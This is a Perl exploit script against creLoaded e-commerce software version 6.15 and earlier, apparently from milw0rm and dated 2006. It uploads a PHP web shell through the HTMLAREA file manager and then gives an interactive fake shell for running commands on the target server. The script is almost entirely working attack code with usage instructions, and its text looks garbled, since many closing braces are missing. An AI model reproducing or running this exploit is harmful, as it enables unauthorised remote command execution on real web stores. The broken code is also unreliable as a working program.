# creLoaded <= 6.15 HTMLAREA automated perl exploit
# hacked up by kaneda <kaneda@blacksecurity.org>
# Rather simple exploit, but still an exploit nonetheless. Attempts to upload php script and
# utilise that to execute commands, and show off a fake shell.
# Can specify:
# * User-defined PHP script or one provided in this script (suits most occasions)
# * Additional variables to pass to PHP script after upload
# * HTTP proxy
# Read the (messy) code before use.
# Greets: nemo, mercy, riotact, zeroday, modem, phildo, gimmemylanta, rodjek, negz
print "creLoaded <= 6.15 HTMLAREA automated perl exploit\nhacked up by kaneda\n";
use LWP::UserAgent;
use HTTP::Request::Common;
use Getopt::Std;
use Term::ReadLine;
my $baseurl = "/admin/htmlarea/popups/file/files.php";
my $status = getopts('s:p:a:');
if(@ARGV < 1) { die(usage()); }
my %vars, $response, $masterurl, $browser, $cmd;
$masterurl = @ARGV[0];
$browser = LWP::UserAgent->new;
if($opt_s) {
print "[*] User-defined script '$opt_s' will be used instead of 'default'\n";
if($opt_p) {
$browser->proxy(['http', 'https'] => $opt_p);
print "[*] HTTP/HTTPS proxy set to $opt_p\n";
if($opt_a) {
@tmp = split(",",$opt_a);
foreach $tmpvar (@tmp) {
@tmp2 = split("=",$tmpvar);
$vars{$tmp2[0]} = $tmp2[1];
print "[+] Adding variable '" . $tmp2[0] . "' with value '" . $tmp2[1] . "'\n";
sub usage
print "usage: creloaded615.pl [-s/path/to/file.php] [-phostname:port] [-avarname1=value1,...,varname2=value2] URL\n\n";
print "-a - additional variables i.e. -aaction=create,cid=12\n";
print "-p - use http/https proxy, format hostname:port i.e. -pmyproxy.com:8080\n";
print "-s - specify path to user-defined script instead of using default\n";
print "URL - http://vuln/store\n\n";
sub sendform
if($opt_G) {
my $url = $masterurl . "?";
# Non-issue, but could beautify the single line here at a later date.
foreach $tmp (keys (%vars)) {
$url .= "\&$tmp=" . $vars{$tmp};
$response = $browser->get($url);
die "Failed to get!" unless defined $response;
} else {
$response = $browser->post($masterurl, \%vars);
die "Failed to post!" unless defined $response;
if(!$opt_s) {
# Lazy.
print "[*] Creating 'default' PHP script\n";
$tmp = "<?php system(\$a); ?>";
open(FILE, "> /tmp/default.php");
print FILE $tmp;
$opt_s = "/tmp/default.php";
open(FILE, "< $opt_s");
@content = <FILE>;
if(!$vars{"dirPath"}) {
print "[*] Setting upload path to $masterurl/images\n";
$vars{"dirPath"} = "/../images/";
$tmp = $masterurl . $baseurl;
print "[*] Abusing creLOADED\n";
$req = POST $tmp, Content_Type => 'form-data', Content => [ actions => "upload", dirPath => $vars{"dirPath"}, upload => [ $opt_s ] ];
$response = $browser->request($req);
$term = Term::ReadLine->new('cre');
print "[*] Executing 'id' then spawning fake shell\n";
$masterurl = $masterurl . "/images/default.php";
$vars{"a"} = "id";
print $response->content;
while(1) {
$prompt = "bash-2.05b\$ ";
$tmp = $term->readline($prompt, "");
$cmd = $tmp;
if(($cmd eq "quit") || ($cmd eq "exit")) {
$vars{"a"} = $cmd;
print $response->content;
# milw0rm.com [2006-01-24]